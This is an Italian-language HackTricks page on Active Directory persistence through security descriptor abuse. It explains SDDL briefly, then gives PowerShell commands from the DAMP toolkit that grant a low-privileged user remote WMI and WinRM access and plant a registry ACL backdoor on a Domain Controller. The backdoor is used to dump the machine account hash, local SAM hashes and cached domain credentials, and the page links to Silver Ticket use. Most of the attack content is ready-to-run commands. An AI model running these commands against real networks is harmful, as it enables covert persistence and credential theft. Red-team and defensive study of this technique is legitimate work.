hacktricks/windows-hardening/active-directory-methodology/security-descriptors.md
2024-02-10 13:03:23 +00:00

5.4 KiB
Raw Blame History

Descrittori di sicurezza

Impara l'hacking di AWS da zero a esperto con htARTE (HackTricks AWS Red Team Expert)!

Altri modi per supportare HackTricks:

Descrittori di sicurezza

Dalla documentazione: Il Linguaggio di Definizione dei Descrittori di Sicurezza (SDDL) definisce il formato utilizzato per descrivere un descrittore di sicurezza. SDDL utilizza stringhe ACE per DACL e SACL: tipo_ace;flag_ace;diritti;guid_oggetto;guid_oggetto_ereditato;sid_account;

I descrittori di sicurezza vengono utilizzati per memorizzare i permessi che un oggetto ha su un oggetto. Se riesci a fare una piccola modifica nel descrittore di sicurezza di un oggetto, puoi ottenere privilegi molto interessanti su quell'oggetto senza bisogno di essere membro di un gruppo privilegiato.

Quindi, questa tecnica di persistenza si basa sulla capacità di ottenere tutti i privilegi necessari su determinati oggetti, per poter eseguire un'operazione che di solito richiede privilegi di amministratore ma senza la necessità di essere amministratore.

Accesso a WMI

Puoi dare a un utente l'accesso per eseguire in remoto WMI utilizzando questo:

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dcnamespace 'root\cimv2' -Remove -Verbose #Remove

Accesso a WinRM

Concedere l'accesso alla console PS di winrm a un utente utilizzando questo:

Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove

Accesso remoto agli hash

Accedi al registro e dumpa gli hash creando un backdoor Reg utilizzando DAMP, in modo da poter recuperare in qualsiasi momento l'hash del computer, il SAM e qualsiasi credenziale AD memorizzata nella cache del computer. Pertanto, è molto utile concedere questa autorizzazione a un utente normale su un computer Domain Controller:

# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose

Controlla Silver Tickets per imparare come puoi utilizzare l'hash dell'account del computer di un Domain Controller.

Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!

Altri modi per supportare HackTricks: